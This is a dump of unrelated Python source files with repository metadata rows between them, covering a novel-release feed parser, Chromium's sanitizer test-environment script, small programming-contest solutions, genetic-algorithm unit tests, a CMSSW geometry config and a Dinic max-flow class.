return buildReleaseMessage(item, 'Spirit Vessel', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('Instant Kill'):
return buildReleaseMessage(item, 'Instant Kill', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('My Daoist Life'):
return buildReleaseMessage(item, 'My Daoist Life', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('Tales of the Reincarnated Lord'):
return buildReleaseMessage(item, 'Tales of the Reincarnated Lord', vol, chp, frag=frag, postfix=postfix)
return False
def extractReincarnationTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSakurane(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if "Reincarnated as a Dragon's Egg" in item['tags']:
return buildReleaseMessage(item, "Reincarnated as a dragon's egg ~Lets aim to be the strongest~", vol, chp, frag=frag, postfix=postfix)
return False
def extractSoulPermutation(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Elf-San with Master' in item['tags']:
return buildReleaseMessage(item, 'Elf-San with Master', vol, chp, frag=frag, postfix=postfix)
if 'Levelmaker' in item['tags']:
return buildReleaseMessage(item, 'Levelmaker', vol, chp, frag=frag, postfix=postfix)
return False
def extractToriiTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTheUndyingCultivator(item):
'''
'''
volstr = str(item['tags']).lower().replace("arc ", "volume ")
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(volstr+item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
extract = re.search(r'\W(\d+)\.(\d+)\W', item['title'])
if extract:
chp = float(extract.group(1))
frag = float(extract.group(2))
if 'The Undying Cultivator' in item['tags']:
return buildReleaseMessage(item, 'The Undying Cultivator', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
def extractPenguTaichou(item):
"""
Pengu Taichou
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPolarBearCatcher(item):
"""
Polar Bear Catcher
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPoorQualityTranslations(item):
"""
Poor Quality Translations
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractPumlated(item):
"""
Pumlated
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower() or "incomplete" in item['title'].lower():
return None
if "(Um, Sorry!) I've been Reincarnated!" in item['tags']:
return buildReleaseMessage(item, "(Um, Sorry!) I've been Reincarnated!", vol, chp, frag=frag, postfix=postfix)
return False
def extractRainbowTurtleTranslations(item):
"""
Rainbow Turtle Translations
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'LMS' in item['tags']:
return buildReleaseMessage(item, 'Legendary Moonlight Sculptor', vol, chp, frag=frag, postfix=postfix)
if 'dungeon hunter' in item['tags']:
return buildReleaseMessage(item, 'Dungeon Hunter', vol, chp, frag=frag, postfix=postfix)
if 'DKG' in item['tags']:
return buildReleaseMessage(item, 'The Demon King\'s Game', vol, chp, frag=frag, postfix=postfix)
return False
def extractRiesTranslations(item):
"""
Ries Translations
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRinveltHouse(item):
"""
Rinvelt House
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRogueApple(item):
"""
Rogue Apple
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRottenTranslations(item):
"""
Rotten Translations
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSabishiDesu(item):
"""
sabishidesu.tk
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSekainoKuroba(item):
"""
Sekai no Kuroba
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractShalvationTranslations(item):
"""
Shalvation Translations
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'Dungeon Defense' in item['tags']:
return buildReleaseMessage(item, 'Dungeon Defense', vol, chp, frag=frag, postfix=postfix)
return False
def extractShamelessOniisan(item):
"""
Shameless Onii-san
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractShineTranslation(item):
"""
Shine Translation
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].startswith('Invincible Level up '):
return buildReleaseMessage(item, 'Invincible Level Up', vol, chp, frag=frag, postfix=postfix)
return False
def extractShouldntbehereblog(item):
"""
Shouldnt be here blog
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractShovaTranslations(item):
"""
Shova Translations
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSilkpantsEntente(item):
"""
Silkpants Entente
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSnowTimeTranslations(item):
"""
SnowTime Translations
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractSteadyTranslation(item):
"""
Steady Translation
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if 'In Different World With Naruto System' in item['tags']:
return buildReleaseMessage(item, 'In Different World With Naruto System', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
return False
def extractSunnyTranslations(item):
"""
SunnyTranslations
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTandQ(item):
"""
T&Q
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if '#Les Interpretes' in item['tags']:
return buildReleaseMessage(item, 'Les Interpretes', vol, chp, frag=frag, postfix=postfix)
if '致我们终将逝去的青春' in item['tags']:
return buildReleaseMessage(item, 'To Our Youth That is Fading Away', vol, chp, frag=frag, postfix=postfix)
return False
def extractTequilaMockingbard(item):
"""
Tequila Mockingbard
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTheBoyWhoCouldntBeAHero(item):
"""
The Boy Who Couldn\'t Be A Hero
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractThePaperFictions(item):
"""
thepaperfictions.wordpress.com
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTokyoESPScans(item):
"""
Tokyo ESP Scans
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractUniqueBooks(item):
"""
Unique Books
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
| [
"[email protected]"
]
| |
2ab6abbd0e1431436acb7dda3b3ede40938d460d | 38c10c01007624cd2056884f25e0d6ab85442194 | /testing/test_env.py | 052df6769b262c442a5b8721ae38c166c659c0b8 | [
"BSD-3-Clause"
]
| permissive | zenoalbisser/chromium | 6ecf37b6c030c84f1b26282bc4ef95769c62a9b2 | e71f21b9b4b9b839f5093301974a45545dad2691 | refs/heads/master | 2022-12-25T14:23:18.568575 | 2016-07-14T21:49:52 | 2016-07-23T08:02:51 | 63,980,627 | 0 | 2 | BSD-3-Clause | 2022-12-12T12:43:41 | 2016-07-22T20:14:04 | null | UTF-8 | Python | false | false | 8,248 | py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Sets environment variables needed to run a chromium unit test."""
import os
import stat
import subprocess
import sys
# This is hardcoded to be src/ relative to this script.
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CHROME_SANDBOX_ENV = 'CHROME_DEVEL_SANDBOX'
CHROME_SANDBOX_PATH = '/opt/chromium/chrome_sandbox'
def get_sandbox_env(env):
"""Returns the environment flags needed for the SUID sandbox to work."""
extra_env = {}
chrome_sandbox_path = env.get(CHROME_SANDBOX_ENV, CHROME_SANDBOX_PATH)
# The above would silently disable the SUID sandbox if the env value were
# an empty string. We don't want to allow that. http://crbug.com/245376
# TODO(jln): Remove this check once it's no longer possible to disable the
# sandbox that way.
if not chrome_sandbox_path:
chrome_sandbox_path = CHROME_SANDBOX_PATH
extra_env[CHROME_SANDBOX_ENV] = chrome_sandbox_path
return extra_env
def trim_cmd(cmd):
"""Removes internal flags from cmd since they're just used to communicate from
the host machine to this script running on the swarm slaves."""
sanitizers = ['asan', 'lsan', 'msan', 'tsan']
internal_flags = frozenset('--%s=%d' % (name, value)
for name in sanitizers
for value in [0, 1])
return [i for i in cmd if i not in internal_flags]
def fix_python_path(cmd):
"""Returns the fixed command line to call the right python executable."""
out = cmd[:]
if out[0] == 'python':
out[0] = sys.executable
elif out[0].endswith('.py'):
out.insert(0, sys.executable)
return out
def get_sanitizer_env(cmd, asan, lsan, msan, tsan):
"""Returns the envirnoment flags needed for sanitizer tools."""
extra_env = {}
# Instruct GTK to use malloc while running sanitizer-instrumented tests.
extra_env['G_SLICE'] = 'always-malloc'
extra_env['NSS_DISABLE_ARENA_FREE_LIST'] = '1'
extra_env['NSS_DISABLE_UNLOAD'] = '1'
# TODO(glider): remove the symbolizer path once
# https://code.google.com/p/address-sanitizer/issues/detail?id=134 is fixed.
symbolizer_path = os.path.abspath(os.path.join(ROOT_DIR, 'third_party',
'llvm-build', 'Release+Asserts', 'bin', 'llvm-symbolizer'))
if lsan or tsan:
# LSan is not sandbox-compatible, so we can use online symbolization. In
# fact, it needs symbolization to be able to apply suppressions.
symbolization_options = ['symbolize=1',
'external_symbolizer_path=%s' % symbolizer_path]
elif (asan or msan) and sys.platform not in ['win32', 'cygwin']:
# ASan uses a script for offline symbolization, except on Windows.
# Important note: when running ASan with leak detection enabled, we must use
# the LSan symbolization options above.
symbolization_options = ['symbolize=0']
# Set the path to llvm-symbolizer to be used by asan_symbolize.py
extra_env['LLVM_SYMBOLIZER_PATH'] = symbolizer_path
else:
symbolization_options = []
if asan:
asan_options = symbolization_options[:]
if lsan:
asan_options.append('detect_leaks=1')
if asan_options:
extra_env['ASAN_OPTIONS'] = ' '.join(asan_options)
if sys.platform == 'darwin':
isolate_output_dir = os.path.abspath(os.path.dirname(cmd[0]))
# This is needed because the test binary has @executable_path embedded in
# it that the OS tries to resolve to the cache directory and not the
# mapped directory.
extra_env['DYLD_LIBRARY_PATH'] = str(isolate_output_dir)
if lsan:
if asan or msan:
lsan_options = []
else:
lsan_options = symbolization_options[:]
if sys.platform == 'linux2':
# Use the debug version of libstdc++ under LSan. If we don't, there will
# be a lot of incomplete stack traces in the reports.
extra_env['LD_LIBRARY_PATH'] = '/usr/lib/x86_64-linux-gnu/debug:'
extra_env['LSAN_OPTIONS'] = ' '.join(lsan_options)
if msan:
msan_options = symbolization_options[:]
if lsan:
msan_options.append('detect_leaks=1')
extra_env['MSAN_OPTIONS'] = ' '.join(msan_options)
if tsan:
tsan_options = symbolization_options[:]
extra_env['TSAN_OPTIONS'] = ' '.join(tsan_options)
return extra_env
def get_sanitizer_symbolize_command(json_path=None, executable_path=None):
"""Construct the command to invoke offline symbolization script."""
script_path = '../tools/valgrind/asan/asan_symbolize.py'
cmd = [sys.executable, script_path]
if json_path is not None:
cmd.append('--test-summary-json-file=%s' % json_path)
if executable_path is not None:
cmd.append('--executable-path=%s' % executable_path)
return cmd
def get_json_path(cmd):
"""Extract the JSON test summary path from a command line."""
json_path_flag = '--test-launcher-summary-output='
for arg in cmd:
if arg.startswith(json_path_flag):
return arg.split(json_path_flag).pop()
return None
def symbolize_snippets_in_json(cmd, env):
"""Symbolize output snippets inside the JSON test summary."""
json_path = get_json_path(cmd)
if json_path is None:
return
try:
symbolize_command = get_sanitizer_symbolize_command(
json_path=json_path, executable_path=cmd[0])
p = subprocess.Popen(symbolize_command, stderr=subprocess.PIPE, env=env)
(_, stderr) = p.communicate()
except OSError as e:
print 'Exception while symbolizing snippets: %s' % e
if p.returncode != 0:
print "Error: failed to symbolize snippets in JSON:\n"
print stderr
def run_executable(cmd, env):
"""Runs an executable with:
- environment variable CR_SOURCE_ROOT set to the root directory.
- environment variable LANGUAGE to en_US.UTF-8.
- environment variable CHROME_DEVEL_SANDBOX set
- Reuses sys.executable automatically.
"""
extra_env = {}
# Many tests assume a English interface...
extra_env['LANG'] = 'en_US.UTF-8'
# Used by base/base_paths_linux.cc as an override. Just make sure the default
# logic is used.
env.pop('CR_SOURCE_ROOT', None)
extra_env.update(get_sandbox_env(env))
# Copy logic from tools/build/scripts/slave/runtest.py.
asan = '--asan=1' in cmd
lsan = '--lsan=1' in cmd
msan = '--msan=1' in cmd
tsan = '--tsan=1' in cmd
if sys.platform in ['win32', 'cygwin']:
# Symbolization works in-process on Windows even when sandboxed.
use_symbolization_script = False
else:
# LSan doesn't support sandboxing yet, so we use the in-process symbolizer.
# Note that ASan and MSan can work together with LSan.
use_symbolization_script = (asan or msan) and not lsan
if asan or lsan or msan or tsan:
extra_env.update(get_sanitizer_env(cmd, asan, lsan, msan, tsan))
if lsan or tsan:
# LSan and TSan are not sandbox-friendly.
cmd.append('--no-sandbox')
cmd = trim_cmd(cmd)
# Ensure paths are correctly separated on windows.
cmd[0] = cmd[0].replace('/', os.path.sep)
cmd = fix_python_path(cmd)
print('Additional test environment:\n%s\n'
'Command: %s\n' % (
'\n'.join(' %s=%s' %
(k, v) for k, v in sorted(extra_env.iteritems())),
' '.join(cmd)))
env.update(extra_env or {})
try:
# See above comment regarding offline symbolization.
if use_symbolization_script:
# Need to pipe to the symbolizer script.
p1 = subprocess.Popen(cmd, env=env, stdout=subprocess.PIPE,
stderr=sys.stdout)
p2 = subprocess.Popen(
get_sanitizer_symbolize_command(executable_path=cmd[0]),
env=env, stdin=p1.stdout)
p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.
p1.wait()
p2.wait()
# Also feed the out-of-band JSON output to the symbolizer script.
symbolize_snippets_in_json(cmd, env)
return p1.returncode
else:
return subprocess.call(cmd, env=env)
except OSError:
print >> sys.stderr, 'Failed to start %s' % cmd
raise
def main():
return run_executable(sys.argv[1:], os.environ.copy())
if __name__ == '__main__':
sys.exit(main())
| [
"[email protected]"
]
| |
f2cd0ab77cb5f8fa5558cf6172353ec2230c9127 | f3d38d0e1d50234ce5f17948361a50090ea8cddf | /CodeUp/Python 기초 100제/6036번 ; 단어 여러 번 출력하기.py | bc0bcc44a3400612fd542a6d58530b3105f25276 | []
| no_license | bright-night-sky/algorithm_study | 967c512040c183d56c5cd923912a5e8f1c584546 | 8fd46644129e92137a62db657187b9b707d06985 | refs/heads/main | 2023-08-01T10:27:33.857897 | 2021-10-04T14:36:21 | 2021-10-04T14:36:21 | 323,322,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # https://codeup.kr/problem.php?id=6036
# readline을 사용하기 위해 import합니다.
from sys import stdin
# 단어와 반복 횟수를 공백으로 구분해 입력합니다.
word, repeat_cnt = stdin.readline().split(' ')
# 반복 횟수는 정수형으로 변환합니다.
repeat_cnt = int(repeat_cnt)
# 입력한 단어를 입력한 횟수만큼 반복해 출력합니다.
print(word * repeat_cnt) | [
"[email protected]"
]
| |
c6e462a6e0fd6dad1a07c73b7443f6fd2dfd4419 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02987/s591389519.py | 8762798d4042e04b87616ffd6fa0f37468561ff7 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | # -*- coding: utf-8 -*-
s = input()
cnt = {l:0 for l in set(s)}
if len(cnt) != 2:
print('No')
exit(0)
for l in s:
cnt[l] += 1
if cnt[l] > 2:
print('No')
exit(0)
print('Yes')
| [
"[email protected]"
]
| |
5f7afd4b4b67a971d1a07293744294fe27cd11a4 | 256644d14bd15f8e1a3e92c95b1655fd36681399 | /backup/GA_NN/v4/testGA.py | c6a234d32f017184ac400c1068bb0f05643dd4d1 | []
| no_license | mfbx9da4/neuron-astrocyte-networks | 9d1c0ff45951e45ce1f8297ec62b69ee4159305a | bcf933491bdb70031f8d9c859fc17e0622e5b126 | refs/heads/master | 2021-01-01T10:13:59.099090 | 2018-06-03T12:32:13 | 2018-06-03T12:32:13 | 12,457,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,124 | py | import unittest
from GA import createPop, pairPop, NN, rankPop, itemgetter
from GA import evolveNewPop, selectTwoIndividuals
from pylab import where, array
class testcreatePop(unittest.TestCase):
def setUp(self):
self.pop = createPop()
def testType(self):
for ind in self.pop:
self.assertIsInstance(ind, NN)
def testWeightsAreNotTheSame(self):
"""Compares each weight against all others but could be sped
up don't need to compare twice"""
for i in range(len(self.pop)):
for j in range(len(self.pop)):
if i != j:
wi1 = array(self.pop[i].wi)
wi2 = array(self.pop[j].wi)
comparisons = where( wi1 == wi2, True, False)
for c in comparisons:
self.assertFalse(c.all())
wo1 = array(self.pop[i].wo)
wo2 = array(self.pop[j].wo)
comparisons = where( wo1 == wo2, True, False)
for c in comparisons:
self.assertFalse(c.all())
def testShapeOfInputWeights(self):
for ind in self.pop:
self.assertEqual(array(ind.wi).shape,
(NN.ni, NN.nh))
def testShapeOfOutputWeights(self):
for ind in self.pop:
self.assertEqual(array(ind.wo).shape,
(NN.nh, NN.no))
class testpairPop(unittest.TestCase):
"""
paired pop is zip(weights, errors, fitnesses)
accessed in the order:
pairedPop[individual][weights][input/output weights]
"""
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
def testShapeOfPairedPop(self):
self.assertEqual(array(self.pairedPop).shape,
(NN.pop_size, 4))
def testWeightsAreACopy(self):
for i in range(len(self.pop)):
self.assertNotEqual(id(self.pop[i].wi),
id(self.pairedPop[i][0][0]),
'input weights, ind ' + str(i) )
self.assertNotEqual(id(self.pop[i].wo),
id(self.pairedPop[i][0][1]),
'output weights, ind ' + str(i))
def testShapeOfInputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][0]).shape,
(NN.ni, NN.nh))
def testShapeOfOutputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][1]).shape,
(NN.nh, NN.no))
class testrankPop(unittest.TestCase):
def setUp(self):
# need to test that rankedPop is ordered in descending order
pass
class testevolveNewPop(unittest.TestCase):
"""
rankedPop is zip(weights, errors, fitnesses) ordered in descending
order of fitness
"""
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
self.rankedPop = sorted(self.pairedPop, key=itemgetter(-1), reverse=True)
self.rankedWeights = [x[0] for x in self.rankedPop]
self.fitnessScores = [x[-1] for x in self.rankedPop]
self.newpopW = evolveNewPop(self.rankedPop)
def testShapeOfInputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][0]).shape,
(NN.ni, NN.nh))
def testShapeOfOutputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][1]).shape,
(NN.nh, NN.no))
def testNotCopiesOfRankedPop(self):
for i in range(len(self.newpopW)):
for j in range(len(self.rankedWeights)):
self.assertNotEqual(id(self.newpopW[i]),
id(self.rankedWeights[j]),
'individual %d\'s weights are a view of ranked' % i +
'weights %d' % j)
for io in range(len(self.newpopW[i])):
self.assertNotEqual(id(self.newpopW[i][io]),
id(self.rankedWeights[j][io]),
'individual %d\'s %d weights are a view '
% (i, io) + 'of ranked weights %d' % j)
def testElitism(self):
for i in range(NN.eliteN):
for io in range(2):
shouldBeZeros = self.rankedWeights[i][io] - self.newpopW[i][io]
self.assertFalse(shouldBeZeros.any())
def testLengthOfNewPop(self):
self.assertEqual(len(self.newpopW), NN.pop_size)
def testShapeOfNewPop(self):
oldshape = array(self.rankedWeights).shape
newshape = array(self.newpopW).shape
self.assertEqual(oldshape, newshape)
for i in range(len(self.pop)):
for io in range(len(self.rankedWeights[i])):
assert io <= 1
self.assertEqual(
array(self.rankedWeights[i][io]).shape,
array(self.newpopW[i][io]).shape)
class testselectTwoIndividuals(unittest.TestCase):
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
self.rankedPop = sorted(self.pairedPop, key=itemgetter(-1), reverse=True)
self.rankedWeights = [x[0] for x in self.rankedPop]
self.fitnessScores = [x[-1] for x in self.rankedPop]
self.ch1, self.ch2 = selectTwoIndividuals(self.fitnessScores, self.rankedWeights)
def testChromosomesAreNotShallowCopies(self):
for i in range(len(self.rankedWeights)):
self.assertNotEqual(
id(self.ch1),
id(self.rankedWeights[i]))
self.assertNotEqual(
id(self.ch2),
id(self.rankedWeights[i]))
for io in range(len(self.rankedWeights[i])):
assert io <= 1
self.assertNotEqual(
id(self.ch1[io]),
id(self.rankedWeights[i][io]))
self.assertNotEqual(
id(self.ch2[io]),
id(self.rankedWeights[i][io]))
if __name__ == '__main__':
unittest.main() | [
"[email protected]"
]
| |
06cb9f6621d634240e8d8059be5f33b447dbb0d2 | 7887a24a4c0eed525a044b785e950d9a71ea7558 | /SimG4Core/PrintGeomInfo/test/python/runDDD2026_cfg.py | ab8ed29b51b7e934ab9a57aa86d12a95a6ee501a | [
"Apache-2.0"
]
| permissive | CMS-HGCAL/cmssw | 1aba653346d5a6a69aa60629b7b0cf81880cef91 | 03230166537ea0ea9e0c975cf28964ee81d545ae | refs/heads/hgcal-condformat-HGCalNANO-13_2_0_pre2 | 2023-08-16T21:25:36.872190 | 2023-08-14T20:05:05 | 2023-08-15T23:28:48 | 62,036,013 | 2 | 2 | Apache-2.0 | 2023-09-12T13:02:50 | 2016-06-27T07:48:31 | C++ | UTF-8 | Python | false | false | 3,674 | py | ###############################################################################
# Way to use this:
# cmsRun runDDD2026_cfg.py geometry=D88
#
# Options for geometry D86, D88, D91, D92, D93, D94, D95, D96, D97, D98, D99
#
###############################################################################
import FWCore.ParameterSet.Config as cms
import os, sys, imp, re
import FWCore.ParameterSet.VarParsing as VarParsing
####################################################################
### SETUP OPTIONS
options = VarParsing.VarParsing('standard')
options.register('geometry',
"D92",
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"geometry of operations: D86, D88, D91, D92, D93, D94, D95, D96, D97, D98, D99")
### get and parse the command line arguments
options.parseArguments()
print(options)
####################################################################
# Use the options
if (options.geometry == "D94"):
from Configuration.Eras.Era_Phase2C20I13M9_cff import Phase2C20I13M9
process = cms.Process('G4PrintGeometry',Phase2C20I13M9)
else:
from Configuration.Eras.Era_Phase2C17I13M9_cff import Phase2C17I13M9
process = cms.Process('G4PrintGeometry',Phase2C17I13M9)
geomFile = "Configuration.Geometry.GeometryExtended2026" + options.geometry + "Reco_cff"
materialFileName = "matfile" + options.geometry + "DDD.txt"
solidFileName = "solidfile" + options.geometry + "DDD.txt"
lvFileName = "lvfile" + options.geometry + "DDD.txt"
pvFileName = "pvfile" + options.geometry + "DDD.txt"
touchFileName = "touchfile" + options.geometry + "DDD.txt"
regionFileName = "regionfile" + options.geometry + "DDD.txt"
print("Geometry file Name: ", geomFile)
print("Material file Name: ", materialFileName)
print("Solid file Name: ", solidFileName)
print("LV file Name: ", lvFileName)
print("PV file Name: ", pvFileName)
print("Touch file Name: ", touchFileName)
print("Region file Name: ", regionFileName)
process.load(geomFile)
process.load('FWCore.MessageService.MessageLogger_cfi')
from SimG4Core.PrintGeomInfo.g4PrintGeomInfo_cfi import *
process = printGeomInfo(process)
if hasattr(process,'MessageLogger'):
process.MessageLogger.G4cerr=dict()
process.MessageLogger.G4cout=dict()
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
DumpSummary = cms.untracked.bool(True),
DumpLVTree = cms.untracked.bool(False),
DumpMaterial = cms.untracked.bool(False),
DumpLVList = cms.untracked.bool(False),
DumpLV = cms.untracked.bool(False),
DumpSolid = cms.untracked.bool(True),
DumpAttributes = cms.untracked.bool(False),
DumpPV = cms.untracked.bool(False),
DumpRotation = cms.untracked.bool(False),
DumpReplica = cms.untracked.bool(False),
DumpTouch = cms.untracked.bool(False),
DumpSense = cms.untracked.bool(False),
DumpRegion = cms.untracked.bool(False),
DD4hep = cms.untracked.bool(False),
Name = cms.untracked.string(''),
Names = cms.untracked.vstring(''),
MaterialFileName = cms.untracked.string(materialFileName),
SolidFileName = cms.untracked.string(solidFileName),
LVFileName = cms.untracked.string(lvFileName),
PVFileName = cms.untracked.string(pvFileName),
TouchFileName = cms.untracked.string(touchFileName),
RegionFileName = cms.untracked.string(regionFileName),
FileDetail = cms.untracked.bool(True),
type = cms.string('PrintGeomInfoAction')
))
| [
"[email protected]"
]
| |
694642cedfed44db0b0286b0ec4dbb6e4b50e77a | 29b58edf26d0e4a965ea758c1f0e6ae51a61d3ed | /Loops/1loops.py | dfc631f39038bed104ec937e38d0060f11e1f85e | []
| no_license | namntran/modern_python3_bootcamp | bfe0fc8b647329f44ad4228d7a12480b9f3821cd | 6b273112b4bd324b95d0dc148c46f605c792c167 | refs/heads/master | 2020-06-16T20:27:41.891467 | 2020-02-16T04:53:16 | 2020-02-16T04:53:16 | 195,694,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | # i = 1
# while i < 5:
# i += i #increment i by 1
# print(i)
# print 1 to 5
# i = 0
# while i <= 5:
# i += 1
# print(i)
# from random import randint # use randint(a, b) to generate a random number between a and b
from random import randint
number = 0 #store random number in here, each time through
i = 0 # i should be incremented by one each iteration
while number != 5: #keep looping while number is not 5
i += 1
number = randint(1, 10) #update number to be a new random int from 1-10
print(number) | [
"[email protected]"
]
| |
2ce0d6b47e327d9dac0dc05d12e07d920f9cbc62 | 94df1d5cd401bd035e36cb96d2ceacd09b223ac0 | /python_library/graph/dinic.py | 256fdc946c39601eaced238f0e62a3606df045f8 | [
"MIT"
]
| permissive | knuu/contest_library | 3b7dce152041009c37caf11a483f9e79e74052ad | 0d3bff34df965d00e1e4a0f2e4fbe8e822810fd5 | refs/heads/master | 2022-11-09T20:44:33.430736 | 2022-11-05T16:22:21 | 2022-11-05T16:22:21 | 180,644,772 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,090 | py | import collections
class MaxFlow:
"""Calculate max flow by Dinic's algorithm
complexity: O(EV^2)
used in GRL6A(AOJ)
"""
class Edge:
"""edge in flow networks"""
def __init__(self, to, cap, rev):
self.to, self.cap, self.rev = to, cap, rev
def __init__(self, V):
""" V: the number of vertexes
E: adjacency list
source: start point
sink: goal point
"""
self.V = V
self.E = [[] for _ in range(V)]
def add_edge(self, fr, to, cap):
self.E[fr].append(self.Edge(to, cap, len(self.E[to])))
self.E[to].append(self.Edge(fr, 0, len(self.E[fr]) - 1))
def run(self, source, sink, INF=10 ** 9):
"""find max-flow"""
maxflow = 0
while True:
self.bfs(source)
if self.level[sink] < 0:
return maxflow
self.itr = [0] * self.V
while True:
flow = self.dfs(source, sink, INF)
if flow > 0:
maxflow += flow
else:
break
def dfs(self, vertex, sink, flow):
"""find augmenting path"""
if vertex == sink:
return flow
for i in range(self.itr[vertex], len(self.E[vertex])):
self.itr[vertex] = i
e = self.E[vertex][i]
if e.cap > 0 and self.level[vertex] < self.level[e.to]:
d = self.dfs(e.to, sink, min(flow, e.cap))
if d > 0:
e.cap -= d
self.E[e.to][e.rev].cap += d
return d
return 0
def bfs(self, start):
"""find shortest path from start"""
que = collections.deque()
self.level = [-1] * self.V
que.append(start)
self.level[start] = 0
while que:
fr = que.popleft()
for e in self.E[fr]:
if e.cap > 0 and self.level[e.to] < 0:
self.level[e.to] = self.level[fr] + 1
que.append(e.to)
| [
"[email protected]"
]
| |
